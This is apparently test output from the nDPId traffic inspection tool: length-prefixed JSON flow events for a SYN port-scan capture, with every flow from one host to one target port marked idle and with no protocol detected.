+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1583,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1594,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1594,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1594,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1594,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":458,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7741,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":458,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7741,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":490,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7741,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":490,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7741,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":540,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":20031,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":540,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":20031,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":873,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1600,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":873,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1600,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":607,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":20031,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":607,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":20031,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":932,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1600,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":932,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1600,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":801,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059737,"flow_last_seen":1278275059737,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":17988,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":801,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059737,"flow_last_seen":1278275059737,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":17988,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":854,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":17988,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":854,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":17988,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":890,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3659,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":890,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3659,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":965,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3659,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":965,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3659,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1737,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061051,"flow_last_seen":1278275061051,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":52822,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1737,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061051,"flow_last_seen":1278275061051,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":52822,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":804,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059737,"flow_last_seen":1278275059737,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5718,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":804,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059737,"flow_last_seen":1278275059737,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5718,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1817,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":52822,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1817,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":52822,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":851,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5718,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":851,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5718,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7777,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7777,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":913,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7778,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":913,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7778,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":518,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5730,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":518,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5730,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7777,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7777,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":984,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7778,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":984,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7778,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":553,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5730,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":553,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5730,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1594,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":26214,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1594,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":26214,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 